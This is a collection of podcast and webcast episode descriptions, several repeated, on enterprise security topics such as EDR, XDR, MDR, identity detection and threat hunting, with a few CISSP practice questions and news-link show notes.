Martin talks about the importance of security for the Atomized Network -- providing enterprises with full visibility and control across their entire network infrastructure. He elaborates on the atomized network. He also talks about how we are trying to weave together different cloud networks. He stresses the need to have one place to bring all the individual pieces and technologies together. He talks about writing/building next generation firewalls, appliance based DPI's, intrusion prevention systems. Netography is built on the idea of having visibility and control. "How can security teams adapt to today's changing, widely dispersed Atomized Network? Maintain visibility and control where Endpoint Detection and Response (EDR), and other traditional solutions simply cannot see independently Help organizations obtain context to their data to visualize and analyze their network by application, location, compliance groups or any other scheme" Connect with Martin: https://www.linkedin.com/in/maroesch/ Visit Netography: https://netography.com/ Visit Short Arms website: https://www.shortarmsolutions.com/ You can follow us at: Linked In: https://www.linkedin.com/company/shortarmsolutions YouTube: https://www.youtube.com/@shortarmsolutions Twitter: https://twitter.com/ShortArmSAS
A cyberattack is not the same thing as malware—in fact, malware itself is typically the last stage of an attack, the punctuation mark that closes out months of work from cybercriminals who have infiltrated a company, learned about its systems and controls, and slowly spread across its network through various tools, some of which are installed on a device entirely by default. The goal of cybersecurity, though, isn't to recover after an attack, it's to stop an attack before it happens. On today's episode of the Lock and Code with host David Ruiz, we speak to two experts at Malwarebytes about how they've personally discovered and stopped attacks in the past and why many small- and medium-sized businesses should rely on a newer service called Managed Detection and Response for protecting their own systems. Many organizations today will already be familiar with the tool called Endpoint Detection and Response (EDR), the de facto cybersecurity tool that nearly every vendor makes that lets security teams watch over their many endpoints and respond if the software detects a problem. But the mass availability of EDR does not mean that cybersecurity itself is always within arm's reach. Countless organizations today are so overwhelmed with day-to-day IT issues that monitoring cybersecurity can be difficult. The expertise can be lacking at a small company. The knowledge of how to configure an EDR tool to flag the right types of warning signs can be missing. And the time to adequately monitor an EDR tool can be in short supply. This is where Managed Detection and Response—MDR—comes in. More a service than a specific tool, MDR is a way for companies to rely on a team of experienced analysts to find and protect against cyberattacks before they happen. The power behind MDR services are its threat hunters, people who have prevented ransomware from being triggered, who have investigated attackers' moves across a network, who have pulled the brakes on a botnet infection. These threat hunters can pore over log files and uncover, for instance, a brute force attack against a remote desktop protocol port, or they can recognize a pattern of unfamiliar activity coming from a single account that has perhaps been compromised, or they can spot a ransomware attack in real time, before it has launched, even creating a new rule to block an entirely new ransomware variant before it has been spotted in the wild. Most importantly, these threat hunters can do what software cannot, explained Matt Sherman, senior manager of MDR delivery services. They can stop the people behind an attack, not just the malware those people are deploying. "Software stops software, people stop people." Today, we speak with Sherman and MDR lead analyst AnnMarie Nayiga about how they find attacks, what attacks they've stopped in the past, why MDR offers so many benefits to SMBs, and what makes for a good threat hunter. You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use. Show notes and credits: Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com) Licensed under Creative Commons: By Attribution 4.0 License http://creativecommons.org/licenses/by/4.0/ Outro Music: “Good God” by Wowa (unminus.com)
Adam Bell and Peter Nikolaidis The Blurring The Lines Podcast Intros, Peter as a son in law, Iphone 14 new features, SOS, Camera size, battery charging, Microsoft Authenticator, photo magic lasso, Dynamic island, favorite feature of the new phone, EDR, XDR, Endpoint Detection and Response, SEIM is multiple sources, Tabletop Exercises – Dungeons & Dragons […]
Bobby Horn chats with Michael Cowley, Senior Vice President of Cyber Risk and Head of Solution Engineering at Kroll, to provide a deeper understanding of the differences between endpoint detection & response platforms (EDR), managed detection & response platforms (MDR), network detection & response tools (NDR) and security information & event management (SIEM), and the benefits that come with each.
In order to implement a successful security system, it starts with security awareness by the employees. They are the first link of defense and at the same time can be the weakest link. Training is a must to get the entire organization on board with the program. Udo Riedel Udo Riedel / CTO and Founder, DriveLock, speaks to Don Witt of The Channel Daily News, a TR publication about their comprehensive solutions. Udo identifies the goals of DriveLock in the U.S. market and how they plan to strengthen their current position. Listen in as Udo also addresses the differences between the European and the U.S. markets and why DriveLock can help U.S. enterprise significantly in securing their network and data. About: They are a German company. Founded in 1999, they are now one of the leading international specialists for IT and data security. They have set themselves the goal of reliably protecting corporate data, devices and systems. To achieve this, they rely on the latest technologies, experienced security experts and solutions based on the Zero Trust model. In today's security architecture, zero trust means a paradigm shift according to the maxim "Never trust, always verify". Their DriveLock Zero Trust platform follows this principle. It combines the elements: Data protection Endpoint protection Endpoint Detection & Response Identity & Access Management The fully integrated zero trust platform supports different operating systems, end devices and is offered as an on-premises solution and managed security service. For more information, go to: https://www.drivelock.com/
The previously distinct but now converged fields and product lines of Endpoint Protection (EPP) and Endpoint Detection & Response (EDR) are covered in the brand new KuppingerCole Analysts Leadership Compass on EPDR (Endpoint Protection Detection & Response). Lead Analyst John Tolbert joins Matthias to give a sneak peek into this market segment and shares some results of the evaluation as well.
The previously distinct but now converged fields and product lines of Endpoint Protection (EPP) and Endpoint Detection & Response (EDR) are covered in the brand new KuppingerCole Analysts Leadership Compass on EPDR (Endpoint Protection Detection & Response). Lead Analyst John Tolbert joins Matthias to give a sneak peek into this market segment and shares some results of the evaluation as well.
Michael meets with Matt Burch, the VP of ComportSecure. They talk about some of the services ComportSecure provides, including IT Solutions, Managed Services, and Cloud Services. They also discuss other cybersecurity topics such as BaaS (Backup as a Service), ransomware, and EDR solutions (Endpoint Detection and Response).
In the modern enterprise network, endpoints have grown exponentially and the built-in perimeter we had at the office has disappeared. In this remote, cloud-native world, bad actors have a wider attack surface to exploit. Enter endpoint detection and response (EDR). Shelby Skrhak speaks with Jennifer Lavender , world wide sales and business development leader for IBM Security at IBM, about: - The difference between EDR and XDR - The acquisition of ReaQta - 3 differentiating components of ReaQta Email Jilina Damin or visit IBM Security ReaQta for more information. To join the discussion, follow us on Twitter @IngramTechSol #B2BTechTalk Listen to this episode and more like it by subscribing to B2B Tech Talk on Spotify, Apple Podcasts, or Stitcher . Or tune in on our website.
In episode 69 of The Cyber5, we are joined by Lima Charlie's CEO, Maxime Lamothe-Brassard. We discuss the future of what's known in the security industry as XDR, which is essentially an enrichment of endpoint detection response products. Three Key Takeaways: 1) What is XDR? Depends who you ask. XDR is not another tool, but merely an extension of Endpoint Detection and Response (EDR) products. Gartner expects 50% of mid-market buyers to adopt XDR strategies by 2027. For context, in around 2010, cybersecurity vendors started driving stronger antivirus solutions for endpoint computers and servers, called Endpoint Detection and Response (EDR). The antivirus was only catching malware with a known signature and not able to detect more malicious lateral movements that are common in today's attacks. Every EDR platform has its own unique set of capabilities. However, some common capabilities include the monitoring of endpoints in both online and offline mode, responding to threats in real-time, increasing visibility and transparency of user data, detecting stored events with malicious malware injections, and creating blacklists and white lists in integration with other technologies. Now that EDR solutions are firmly within the market, they need to be integrated with other tools, including threat intelligence, to be effective at scale for the enterprise. These massive integrations needed at scale, especially with the cloud, are what is starting to be defined as XDR. 2) What are the key integrations to EDR products to form an XDR strategy? a. Identity Access Management: Gives visibility to who is accessing what applications and websites in the enterprise. b. Threat Intelligence: Information and artifacts from attacker infrastructure, previous compromises, and behavior that can be identified outside of firewalls. c. Cloud and SaaS Logging: Any application in the cloud produces a log for access and use. 3) XDR does not have to be expensive or manpower-intensive for SMB. a. Cloud, SaaS, and Identity Access Management produce logs that can be integrated into easy solutions that do not need to be complex products, particularly for SMB. b. Enablement should be the critical aspect of XDR rather than more expensive tooling. c. Easy, automatable solutions to apply security controls are the critical way forward for medium and large enterprises.
BlueLeaks hack exposes US police data, Endpoint Detection and Response security, and Microsoft Philanthropies' Microsoft Tech for Social Impact (TSI). Hackers just leaked sensitive files from over 200 police departments that are searchable by badge number A new census finds hundreds of open source components that could undermine security New industry spec would have CPUs built using components from multiple vendors Apple teams up with Google, Mozilla, Microsoft to improve browser interoperability Enterprises look beyond VPNs and antivirus software for remote workers with a growing emphasis on endpoint detection and response (EDR) Microsoft Philanthropies' Erik Arnold talks about what Microsoft Tech for Social Impact (TSI) does for NGOs and non-profit organizations Hosts: Louis Maresca and Curt Franklin Co-Host: Oliver Rist Guest: Erik Arnold Download or subscribe to this show at https://twit.tv/shows/this-week-in-enterprise-tech. Get episodes ad-free with Club TWiT at https://twit.tv/clubtwit Sponsors: newrelic.com/enterprise nureva.com plextrac.com/twit
BlueLeaks hack exposes US police data, Endpoint Detection and Response security, and Microsoft Philanthropies' Microsoft Tech for Social Impact (TSI). Hackers just leaked sensitive files from over 200 police departments that are searchable by badge number A new census finds hundreds of open source components that could undermine security New industry spec would have CPUs built using components from multiple vendors Apple teams up with Google, Mozilla, Microsoft to improve browser interoperability Enterprises look beyond VPNs and antivirus software for remote workers with a growing emphasis on endpoint detection and response (EDR) Microsoft Philanthropies' Erik Arnold talks about what Microsoft Tech for Social Impact (TSI) does for NGOs and non-profit organizations Hosts: Louis Maresca and Curt Franklin Co-Host: Oliver Rist Guest: Erik Arnold Download or subscribe to this show at https://twit.tv/shows/this-week-in-enterprise-tech. Get episodes ad-free with Club TWiT at https://twit.tv/clubtwit Sponsors: newrelic.com/enterprise nureva.com plextrac.com/twit
BlueLeaks hack exposes US police data, Endpoint Detection and Response security, and Microsoft Philanthropies' Microsoft Tech for Social Impact (TSI). Hackers just leaked sensitive files from over 200 police departments that are searchable by badge number A new census finds hundreds of open source components that could undermine security New industry spec would have CPUs built using components from multiple vendors Apple teams up with Google, Mozilla, Microsoft to improve browser interoperability Enterprises look beyond VPNs and antivirus software for remote workers with a growing emphasis on endpoint detection and response (EDR) Microsoft Philanthropies' Erik Arnold talks about what Microsoft Tech for Social Impact (TSI) does for NGOs and non-profit organizations Hosts: Louis Maresca and Curt Franklin Co-Host: Oliver Rist Guest: Erik Arnold Download or subscribe to this show at https://twit.tv/shows/this-week-in-enterprise-tech. Get episodes ad-free with Club TWiT at https://twit.tv/clubtwit Sponsors: newrelic.com/enterprise nureva.com plextrac.com/twit
BlueLeaks hack exposes US police data, Endpoint Detection and Response security, and Microsoft Philanthropies' Microsoft Tech for Social Impact (TSI). Hackers just leaked sensitive files from over 200 police departments that are searchable by badge number A new census finds hundreds of open source components that could undermine security New industry spec would have CPUs built using components from multiple vendors Apple teams up with Google, Mozilla, Microsoft to improve browser interoperability Enterprises look beyond VPNs and antivirus software for remote workers with a growing emphasis on endpoint detection and response (EDR) Microsoft Philanthropies' Erik Arnold talks about what Microsoft Tech for Social Impact (TSI) does for NGOs and non-profit organizations Hosts: Louis Maresca and Curt Franklin Co-Host: Oliver Rist Guest: Erik Arnold Download or subscribe to this show at https://twit.tv/shows/this-week-in-enterprise-tech. Get episodes ad-free with Club TWiT at https://twit.tv/clubtwit Sponsors: newrelic.com/enterprise nureva.com plextrac.com/twit
We are in an era of increase of IoT devices and the introduction of industrial IoT devices into manufacturing environments. How do you secure this equipment when mixed with legacy equipment that has been running for 10, 20 or more years in production? William Noto, Global Director of Operational Technology Product Marketing at Fortinet, discusses concerns impacting manufacturing organizations when introducing IoT devices to the environment; risks that arise when modern technology is mixed with legacy technology and much more.
Identity Detection and Response (IDR) is a new security category that focuses on protecting credentials, privileges, cloud entitlements, and the systems that manage them across endpoints, Active Directory, and the Cloud through visibility and early detection of attacks targeting identities. Attackers consider enterprise identities as high-value targets and attempt to compromise them early in the attack to access the network and gain privileges to essential production assets. Current identity security focuses on safeguarding privileged credentials in PAM solutions or securing the authentication process with MFA and IAM solutions, but these measures leave gaps that attackers can exploit. While current security solutions like Endpoint Detection and Response (EDR), Extended Detection and Response (XDR), Network Detection and Response (NDR), and others provide specific functions for defending the network, they do not focus on identities. EDR focuses on preventing the initial compromise, while XDR and NDR try to detect attacks as they expand from the beachhead. Attacks targeting enterprise identities can evade detection from these security controls, but IDR solutions can bridge these detection gaps to identify such attacks. Join Joseph Salazar from Attivo Networks as he discusses the importance of IDR to modern enterprise security. Segment Resources: https://attivonetworks.com/documentation/Attivo_Networks-Identity_Detection_Response.pdf https://attivonetworks.com/what-is-identity-detection-and-response-idr/ https://attivonetworks.com/solutions/identity-security/ This segment is sponsored by Attivo Networks. Visit https://securityweekly.com/attivonetworks to learn more about them! Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw244
Identity Detection and Response (IDR) is a new security category that focuses on protecting credentials, privileges, cloud entitlements, and the systems that manage them across endpoints, Active Directory, and the Cloud through visibility and early detection of attacks targeting identities. Attackers consider enterprise identities as high-value targets and attempt to compromise them early in the attack to access the network and gain privileges to essential production assets. Current identity security focuses on safeguarding privileged credentials in PAM solutions or securing the authentication process with MFA and IAM solutions, but these measures leave gaps that attackers can exploit. While current security solutions like Endpoint Detection and Response (EDR), Extended Detection and Response (XDR), Network Detection and Response (NDR), and others provide specific functions for defending the network, they do not focus on identities. EDR focuses on preventing the initial compromise, while XDR and NDR try to detect attacks as they expand from the beachhead. Attacks targeting enterprise identities can evade detection from these security controls, but IDR solutions can bridge these detection gaps to identify such attacks. Join Joseph Salazar from Attivo Networks as he discusses the importance of IDR to modern enterprise security. Segment Resources: https://attivonetworks.com/documentation/Attivo_Networks-Identity_Detection_Response.pdf https://attivonetworks.com/what-is-identity-detection-and-response-idr/ https://attivonetworks.com/solutions/identity-security/ This segment is sponsored by Attivo Networks. Visit https://securityweekly.com/attivonetworks to learn more about them! Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw244
On this week's show Patrick Gray and Adam Boileau discuss recent security news, including: More info on the Belarusian Cyber Patriots How infosec overhyped election security risks Is data ransoming dying? All about the Azure Cosmos DB drama Much, much more… In this week's sponsor interview Airlock Digital's Daniel Schell and David Cottingham join the show to talk about EDR bypasses. They are a thing. Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that's your thing. Show notes Belarusian hackers are turning the country's surveillance state against it | MIT Technology Review A new wave of Hacktivists is turning the surveillance state against itself - The Record by Recorded Future Trump conspiracies strain election cybersecurity experts T-Mobile CEO apologizes after hacker stole millions of users' personal information Bangkok Air confirms passenger PII leak after ransomware attack - The Record by Recorded Future Leaked Guntrader firearms data file shared. Worst case scenario? Criminals plot UK gun owners' home addresses in Google Earth • The Register Hackers steal $29 million from crypto-platform Cream Finance - The Record by Recorded Future U.S. spy agencies rule out possibility the coronavirus was created as a bioweapon, say origin will stay unknown without China's help - The Washington Post Australia's 'hacking' Bill passes the Senate after House made 60 amendments | ZDNet White House rolls out pipeline, supply chain security initiatives as companies pledge billions in cyber spending CISA adds single-factor authentication to its catalog of 'Bad Practices' - The Record by Recorded Future DHS urges Microsoft customers to update Azure to avoid security flaw Microsoft Azure vulnerability exposed thousands of cloud databases CISA and the FBI warn of ransomware gangs' tendency of launching attacks over holidays and weekends - The Record by Recorded Future FBI warns that Hive ransomware hackers are calling victims by phone Deserialization bug in TensorFlow machine learning framework allowed arbitrary code execution | The Daily Swig A Dark Web Murder-For-Hire Scammer Became An FBI Informant WhatsApp, Facebook, and Twitter fined for not storing user data inside Russia - The Record by Recorded Future A Bad Solar Storm Could Cause an 'Internet Apocalypse' | WIRED Trial & Error in Kuwait - CyberScoop How Data Brokers Sell Access to the Backbone of the Internet Man Robbed of 16 Bitcoin Sues Young Thieves' Parents – Krebs on Security Front Matter | Understanding and Managing Risk in Security Systems for the DOE Nuclear Weapons Complex: (Abbreviated Version) | The National Academies Press JCP | Free Full-Text | An Empirical Assessment of Endpoint Detection and Response Systems against Advanced Persistent Threats Attack Vectors | HTML
Attackers are always ahead of the game and today you need more than having a lock on your front door. Modern security requires organizations to think outside the box, re-architect their environment, and be able to scale more efficiently and effectively. In this first episode, we sat down with Brad LaPorte to discuss Endpoint Detection and Response (EDR) in depth. Brad has spent time in US Cyber Intelligence, large technology companies like IBM, research firm Gartner, and today as partner at High Tide Advisors a firm specializing in go-to-market consulting. Topics discussed in this episode: Topics discussed in this episode: How Brad has seen endpoint detection and response evolve over the last 5 years. How attackers are always well financed and resourced. Organizations' struggles with application control. What caused the shift from AV to EDR products and tools. How detection as code is critical for many reasons. The biggest challenges Brad has seen when deploying EDR in a large organization. The importance of educating your leadership, have a proper plan, use case, and assess your operational readiness when implementing EDR. Recommendations for engineers looking to build their own version of an EDR platform. Tools and technologies that Brad is paying attention to like zero trust architecture. 3 pieces of advice for security teams looking to succeed at EDR at scale.
In this episode, our host, FalconSpy, sits down with Topher Timzen (@ttimzen) and Michael Leibowitz (@r00tkillah), two red teamers from Oracle. They discuss a number of topics, including Topher's and Michael's DEF CON 27 Endpoint Detection & Response presentation. They dive into how they got into the infosec field and what makes them so passionate about it. Find out their answer to the age-old question: what's the difference between red teaming and pentesting? Plus, get their take on certifications and what you really need these days to be successful. Finally, as BSides Portland organizers, Topher and Michael give you a rundown on the process of developing a security conference. Enjoy!
In episode 51 of The Cyber5, we are joined by Chris Castaldo. Chris is the Chief Information Security Officer for CrossBeam and has been CISO for a number of emerging technology companies. In this episode, we talk about his newly released book, “Startup Secure” and how different growth companies can implement security at different funding stages. He also talks about the reasons security professionals should want to be a start-up CISO at a growing technology company and how success can be defined as a first time CISO. We also talk about how start up companies can avoid ransomware events in a landscape that is not only constantly changing but also gives little advantage for defenders of small and medium sized enterprises. Two Topics Covered in this Episode: 4 Security Lessons for Founders of Start-up Technology Companies When a B2B company is pre-seed or before Series A funding, customers might have leeway for lax cybersecurity controls. However, after an A round, policies, certifications (SOC2 or ISO27001), procedures will be required to ensure customer data is staying safe. A B2C technology company might not be asked by the public for certifications, but auditors and regulators may. Basic policies include: Single Sign-On or an Okta authentication into applications, cloud, and workstations Password management implementation (LassPass or OnePassword) Encryption at rest and transit Vulnerability scanning Combating Ransomware from The Inside-Out Approach and Integrating Threat Intelligence Blocking and tackling from inside-out to get in front of ransomware is challenging. The simple items to tackle are the following: Auto-updates for patch management on operating systems Endpoint Detection and Response products Proper asset management to have full visibility on all network devices and services At the point when resilience and compliance controls are in place and an organization can bounce back from an incident in a timely manner, adversary insights via threat intelligence is a logical next step.
While new technologies are constantly being developed to fight cybercrime and strengthen cybersecurity systems, much of the cybersecurity is left yawning. New additions to technologies such as Endpoint Detection and Response (EDR), while effective, are not implementing the level of change that we need to see if we want to ensure safety while reducing workloads of employees. EDR, for instance, often sends alerts to employees notifying them that unexpected activities need to be investigated. How many emails do we receive a day from job recruiters, collaboration tools, social media tools and others? Of course, investigating cyberthreats is important, but it's hard to care about additional newsflashes after receiving your 20th promotional email of the week from your local pizzeria. Beyond this, there are already some serious undeniable threats in cyberspaces that cannot be ignored. With hundreds of devices existing within every organisation, there exists hundreds of attack vectors. Yes, certain cybersecurity technologies can exist, but adversaries always develop new attack methods. Really, it's worth keeping up to date with the latest news in AI in order to find a technology that can learn these methods and grow over time. News in AI proves to be more and more interesting everyday with new technologies being applied to protect security interests. For those of us already working in cybersecurity, machine learning in AI is old news, but how many organisations are using deep learning-based prevention? According to Deep Instinct, deep learning-based prevention helps us to surpass "The Cybersecurity Trade-Off" where organisations prevent threats, but also receive high volumes of false positives. This helps to prevent a 'boy-cried-wolf' situation and instead brings real, analysed threats to your attention. Delivering us the latest news in AI is Shimon Noam Oren, VP Research & Deep-Learning at Deep Instinct. In this podcast, he delves into the 'prevention trade-off dilemma', the problems with cybersecurity prevention software, the ins and outs of deep learning and how it can provide a more robust cybersecurity methodology.
In episode 50 of The Cyber5, we are joined by Paul Kurtz. Paul's career includes serving as Director of Counter-Terrorism, Senior Director for Cyber Security, and Special Assistant to the President of the United States for Critical Infrastructure Protection. He was previously the CEO of Threat Intelligence Platform TrueStar and is now the Chief Cybersecurity Advisor, Public Sector at Splunk. In this episode, we discuss the Biden Administration's executive order for cybersecurity and how it impacts the public and private sector in relation to intelligence management. We also talk about an inside-out network approach and the criticality of cloud migration in detecting cyber threats at scale. We further discuss the value of threat intelligence and the importance of integration with enterprise systems. 6 Topics Covered in this Episode: Three Key Points of the Executive Order: While important topics such as zero trust identity access management and third party risk management get the major attention, three important, but often overlooked, points covered in the executive order are: Cloud Transition Information Sharing Data Collection and Preservation From an intelligence management and security perspective, the migration of the US public sector to the cloud, coupled with information sharing and data preservation are the most important actions to reduce mean time to detect and alert, mean time to respond, and mean time to remediate. Need for Automation of Internal and External Telemetry Endpoint Detection and Response, next generation anti-virus, next generation firewalls, and IAM (identity and access management) are examples of the advancement in enterprise security solutions. These technologies are now being augmented by threat intelligence solutions. Integrating and automating this suite of advanced capabilities is key to optimizing intelligence and defending against increasingly sophisticated threat actors. MSSP are Critical to Protecting SMBs MSSPs must integratie their alerting and detection ability to the cloud in order to protect small and medium sized businesses. Small and medium sized businesses don't typically have the security teams or expertise to patch, remediate, and threat hunt. MSSPs with MDR capability can effectively serve this market. Threat Intelligence Must Be Integrated to Augment Existing Telemetry Threat intelligence must be actionable. A key action to achieving actionability is the integration into an internet ticketing system, a Security Event Management Tool (SIEM), a Threat Intelligence Platform, or an Endpoint Detection and Response solution. Behavior is King for Appropriate Context The ability to detect malicious behavior from actors inside a network and initiate an appropriate response. This is not possible without the context provided by cloud integration, log aggregation, a retrospective “look back” capability, and the integration of external data and internal telemetry. US Civilian Agencies Need a Roadmap for Cloud Integration If the Central Intelligence Agency can embrace the cloud, so can other agencies. A federal roadmap is urgently needed to defend against attacks by sophisticated adversaries.
In this episode I have a special co-host Natasha Young. Natasha is my WomSA security mentee. Here and I had a chance to speak with Stephanie Aceves about endpoint solutions as a security AND business tool. Stephanie is an Threat Response Subject Matter Expert Leads for Tanium.Talking Points:What's the difference between EDR and what Tanium does? Specifically, how can end-point management systems close the gap between traditional detection systems and automation while still being able to manage time sensitivity?What are some of the lessons learned from recent cyber attacks, such as SolarWinds, Microsoft Exchange, and the Colonial Pipeline where a tool like Tanium (end-point management) could have prevented or mitigated the damage?President Biden signed an executive order recently, this past May to improve cybersecurity in America. In the executive order talked about Improving Detection of Cybersecurity Incidents on Federal Government Networks. “The Federal government should lead in cybersecurity, and strong, Government-wide Endpoint Detection and Response (EDR) deployment coupled with robust intra-governmental information sharing are essential.” Where can Tanium be used with some of the statements made around EDR?What does this executive order mean for Tanium and has the company adopted this as an opportunity to help other companies? Podcast Sponsor: This episode was sponsored by Tanium. Tanium is an endpoint security solution and they are based out of Kirkland, Washington. As always proceeds from the sponsorship will go towards charities in Michigan.
PhoneBoy talks with Product Manager Yoni Nave about the evolution from Endpoint Detection and Response (EDR) to Extended Detection and Response (XDR).
PhoneBoy talks with Product Manager Yoni Nave to answer the question What is Endpoint Detection and Response?
Today I will discuss: 1. What is Endpoint Detection & Response (EDR)? 2. How does EDR combat against new threats? 3. Why is EDR better than Traditional Endpoint Security? 4. What kind of response can EDR generate? Watch
A few short years ago, penetration testers did not have to work too hard for their malware command channels to execute. Fast forward to today in the age of Endpoint Detection and Response, User Behavior Analytics, and advanced built-in O/S defenses, your standard toolkit for malware generation/execution does not work anymore. All is not lost! […] The post Webcast: Move Aside Script Kiddies – Malware Execution in the Age of Advanced Defenses appeared first on Black Hills Information Security.
In questo episodio Adelmo ci aiuterà a capire come funziona un antivirus e in che modo la trasformazione in Endpoint Detection and Response (EDR) li abbia resi sempre più intelligenti e funzionali.
Новый подкаст Хабра под названием ПРО — это аудиоверсия наших видкастов на Ютубе. Здесь новые ведущие, новые актуальные темы и новые гости. Причем гостей всегда двое, чтобы взглянуть на вопрос с разных точек зрения и составить профессиональное мнение. Видкаст здесь: https://u.tmtm.ru/habrpro 1:45 Современные кибератаки: виды, этапы, примеры 10:35 Как не стать жертвой: меры предосторожности для частных лиц 15:50 Автоматическое обновление прошивки роутера – хорошо или плохо 16:40 Почему атаки на индустриальные предприятия опаснее, чем на финансовые 24:00 Мыслить, как киберпреступник: как специалисты по ИБ ищут уязвимости в корпоративных сетях – интересные кейсы 29:50 Особенности защиты российских ВПК и отечественные наработки в сфере ИБ 35:00 Почему фишинг по-прежнему эффективен 39:30 Дилемма между сложным паролем, который можно забыть, и простым, который с большей вероятностью взломают. Как и где хранить пароли? 46:10 Как защитить аккаунты, авторизация которых завязана на ваш мобильный телефон 47:50 О рынке специалистов по ИБ, их квалификации и заработках 55:50 Нужны ли Security Operations Center? А антивирусы? Почему растёт популярность EDR-решений (Endpoint Detection and Response) 1:00:50 Что делать компаниям, у которых нет выделенного ИБ-специалиста 1:09:15 Правда ли, что удобнее использовать продукты одного вендора, чем нескольких 1:14:30 Звонки мошенников – что делать 1:17:05 Как ИИ используется в ИБ
Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career. Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity. Shon will provide CISSP study and training for Domain 4 (Communication and Network Security) of the CISSP Exam. His knowledge will provide the skills needed to pass the CISSP. BTW - Get access to all my Free Content and CISSP Training Courses here at: https://shongerber.com/ Available Courses: CISSP Training Course - https://www.shongerber.com/offers/zYsL6MCB CISO Training Course - https://www.shongerber.com/offers/zd2RbL6o CISSP Exam Questions Question: 159 Vulnerabilities and risks are evaluated based on their threats against which of the following? A) One or more of the CIA Triad principles B) Data usefulness C) Due care D) Extent of liability One or more of the CIA Triad principles Vulnerabilities and risks are evaluated based on their threats against one or more of the CIA Triad principles. https://www.brainscape.com/subjects/cissp-domains ------------------------------------ Question: 160 While performing a risk analysis, you identify a threat of fire and a vulnerability because there are no fire extinguishers. Based on this information, which of the following is a possible risk? A) Virus infection B) Damage to equipment C) System malfunction D) Unauthorized access to confidential information Damage to equipment The threat of a fire and the vulnerability of a lack of fire extinguishers lead to the risk of damage to equipment. https://www.brainscape.com/subjects/cissp-domains ------------------------------------ Question: 161 What process or event is typically hosted by an organization and is targeted to groups of employees with similar job functions? A) Education B) Awareness C) Training D) Termination Training Training is teaching employees to perform their work tasks and to comply with the security policy. Training is typically hosted by an organization and is targeted to groups of employees with similar job functions. https://www.brainscape.com/subjects/cissp-domains Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS: ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources Online Article https://www.cio.com/article/2381021/best-practices-how-to-create-an-effective-business-continuity-plan.html
18/11/2019. El pasado Lunes 18 de noviembre, en el espacio de ciberseguridad del AfterWork de Capital Radio, tuvimos una jornada especial en la que hablamos con distintas empresas que se dedican a crear soluciones que permitan defender a organizaciones y ciudadanos de los ciberataques. Dentro del amplio catalogo de soluciones que todos ellos tienen, quisimos centrarnos en las soluciones EDR, Endpoint Detection and Response. Para ello contamos con la presencia de expertos como Ángel Ortiz de McAfee, Jesús Díaz de Palo Alto Networks, Alberto Tejero de Panda Security e Ivan Mateos de Sophos. Con todos ellos estuvimos hablando de las ventajas que aportan los EDR a la hora de proteger una organización o los equipos personales de las personas. +info: https://psaneme.com/2019/11/22/edr-protegiendo-activamente/ +info: https://psaneme.com/radio/
Going beyond basic perimeter defense, Threat Hunting cuts through the noise of endpoint telemetry and anti-virus data to find nation-state level Advanced Persistent Threats (APTs) that hide below the alert threshold. We will demonstrate, through 4 hunt analytic use cases, how to overcome the legacy challenge of relying on Packet Capture (PCAP) data to detect adversaries, highlighting the need to transform Hunt operations by combining Endpoint Detection and Response (EDR) telemetry data with knowledge of APT behavior to find hidden adversaries. This talk will provide a framework for planning and executing hunts, demonstrate why focusing on EDR telemetry data can add additional value over and beyond traditional network data, and how to strengthen hunting through a Purple Team approach. Speaker(s) Max Moerles, Cyber Threat Analyst , Booz Allen Hamilton Jay Novak, Threat Hunt Team Lead, Booz Allen Hamilton Slides PDF link - https://conf.splunk.com/files/2019/slides/SEC1250.pdf?podcast=1577146224 Product: Splunk Enterprise Track: Security, Compliance and Fraud Level: Good for all skill levels
Splunk [Security, Compliance and Fraud Track] 2019 .conf Videos w/ Slides
Going beyond basic perimeter defense, Threat Hunting cuts through the noise of endpoint telemetry and anti-virus data to find nation-state level Advanced Persistent Threats (APTs) that hide below the alert threshold. We will demonstrate, through 4 hunt analytic use cases, how to overcome the legacy challenge of relying on Packet Capture (PCAP) data to detect adversaries, highlighting the need to transform Hunt operations by combining Endpoint Detection and Response (EDR) telemetry data with knowledge of APT behavior to find hidden adversaries. This talk will provide a framework for planning and executing hunts, demonstrate why focusing on EDR telemetry data can add additional value over and beyond traditional network data, and how to strengthen hunting through a Purple Team approach. Speaker(s) Max Moerles, Cyber Threat Analyst , Booz Allen Hamilton Jay Novak, Threat Hunt Team Lead, Booz Allen Hamilton Slides PDF link - https://conf.splunk.com/files/2019/slides/SEC1250.pdf?podcast=1577146215 Product: Splunk Enterprise Track: Security, Compliance and Fraud Level: Good for all skill levels
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
Phishing E-Mail Spoofing SPF Protected Domain https://isc.sans.edu/forums/diary/Phishing+email+spoofing+SPFenabled+domain/25426/ Purchased Domain Arrives with Paypal Accounts Linked to it https://www.theregister.co.uk/2019/10/17/paypal_account_domain/ Typosquatting Attacks Affect 2020 Presidential Election https://www.digitalshadows.com/blog-and-research/typosquatting-and-the-2020-u-s-presidential-election/ STI Student: Christopher Hurless Exploring Osquery, Fleet, and Elastic Stack as an Open-source solution to Endpoint Detection and Response https://www.sans.org/reading-room/whitepapers/detection/paper/39165
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
Phishing E-Mail Spoofing SPF Protected Domain https://isc.sans.edu/forums/diary/Phishing+email+spoofing+SPFenabled+domain/25426/ Purchased Domain Arrives with Paypal Accounts Linked to it https://www.theregister.co.uk/2019/10/17/paypal_account_domain/ Typosquatting Attacks Affect 2020 Presidential Election https://www.digitalshadows.com/blog-and-research/typosquatting-and-the-2020-u-s-presidential-election/ STI Student: Christopher Hurless Exploring Osquery, Fleet, and Elastic Stack as an Open-source solution to Endpoint Detection and Response https://www.sans.org/reading-room/whitepapers/detection/paper/39165
Endpoint Detection & Response is quickly becoming the standard in cybersecurity.In this episode, Grant Haroway, Lead Investigator in Content Security's Digital Forensics and Incident Response Team, discusses the benefits of Endpoint Detection and Response, and how an EDR solution works in an incident response scenario.
